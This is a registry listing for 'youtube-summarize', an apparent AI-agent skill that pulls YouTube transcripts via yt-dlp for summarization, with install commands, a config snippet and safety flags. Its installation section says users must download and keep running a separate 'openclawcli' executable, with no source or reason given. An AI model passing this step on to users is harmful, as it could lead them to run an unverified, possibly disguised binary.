ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

youtube-summarize

Summarize YouTube videos by extracting transcripts and captions. Use when you need to get a quick summary of a video, extract key points, or analyze video content without watching it.

Why use this skill?

Use the youtube-summarize skill to extract video transcripts and get instant AI summaries, key takeaways, and analysis without watching long videos.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/jordanprater/youtube-summarize
Or

What This Skill Does

The youtube-summarize skill is a powerful OpenClaw agent capability designed to bridge the gap between long-form video content and concise text analysis. By leveraging the industry-standard yt-dlp tool alongside the required openclawcli utility, this skill programmatically extracts, cleans, and formats YouTube captions and transcripts. Once the raw subtitle data is processed into clean, human-readable text, it can be passed directly to the AI agent for summarization, key point extraction, or in-depth content analysis. This allows users to consume complex video information without the necessity of watching or listening to the media files.

Installation

Installation is a two-step process requiring both the yt-dlp package and the essential openclawcli tool. First, ensure you have Python installed and run pip install yt-dlp to fetch the downloader. Second, visit the official repositories to download the appropriate openclawcli executable for your operating system (Windows or macOS). It is critical that the openclawcli service is running locally before attempting any transcript extraction, as it acts as the bridge for external subtitle processing.

Use Cases

This skill is ideal for researchers needing to cite video content, students analyzing long educational lectures, and professionals who need to quickly grasp the takeaways from industry webinars or product tutorials. It is perfect for turning hours of video footage into a two-minute read.

Example Prompts

  1. "Summarize this video: https://www.youtube.com/watch?v=dQw4w9WgXcQ and list the three most important takeaways."
  2. "Extract the transcript from this tech tutorial and highlight any commands mentioned in the video."
  3. "Analyze the following YouTube video link to provide a bulleted summary of the speaker's main arguments."

Tips & Limitations

Note that this skill relies on the presence of closed captions or auto-generated subtitles. If a video has subtitles disabled or lacks audio, transcript extraction will fail. Always verify that your network allows the execution of yt-dlp and that you have sufficient disk permissions for the file writing process. For the best accuracy, prioritize videos with manual captions over auto-generated ones.

Metadata

Stars1947
Views0
Updated2026-03-04
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-jordanprater-youtube-summarize": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#youtube#summarizer#transcription#video-analysis#productivity
Safety Score: 4/5

Flags: network-access, file-write, file-read, code-execution